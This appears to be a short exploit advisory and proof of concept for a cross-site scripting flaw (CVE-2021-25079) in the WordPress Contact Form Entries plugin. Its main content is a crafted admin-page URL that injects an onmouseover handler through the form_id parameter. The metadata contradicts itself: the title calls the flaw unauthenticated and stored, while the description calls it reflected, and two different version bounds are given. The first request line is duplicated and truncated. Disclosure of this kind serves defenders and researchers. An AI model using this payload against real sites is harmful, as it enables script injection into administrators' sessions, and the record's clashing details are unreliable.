# Exploit Title: Contact Form Entries < 1.1.7 - Unauthenticated Stored Cross-Site Scripting. # Date: 22/12/2021 # Exploit Author: gx1 # Vulnerability Discovery: Gaetano Perrone (aka gx1) # Vendor Homepage: https://www.crmperks.com/ # Software Link: https://wordpress.org/plugins/contact-form-entries/ # Version: < 1.2.4 # Tested on: any # CVE : CVE-2021-25079 # References: * https://wpscan.com/vulnerability/c3d49271-9656-4428-8357-0d1d77b7fc63 * https://secsi.io/blog/cve-2021-25079-multiple-reflected-xss-in-contact-form-entries-plugin/ # Description: Several params of vxcf_leads administrator page are vulnerable to a Reflected Cross-Site-Scripting vulnerability. # Proof Of Concept: The following request: --------------------------------------------------------------------------------------------------------------------------------------- GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=desc&orderby=fir+GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=desc&orderby=fir+ --------------------------------------------------------------------------------------------------------------------------------------- returns the list of saved entries in the database. form_id value is reflected in tag. form_id parameter is not sanitized, so it is possible to inject arbitrary values. The following request: --------------------------------------------------------------------------------------------------------------------------------------- http://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5e1kpc%22+onmouseover%3Dalert%281%29+ne97l&status&tab=entries&search&order=desc&orderby=fir+ --------------------------------------------------------------------------------------------------------------------------------------- Allows to inject onmouseover inside the input form. ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Source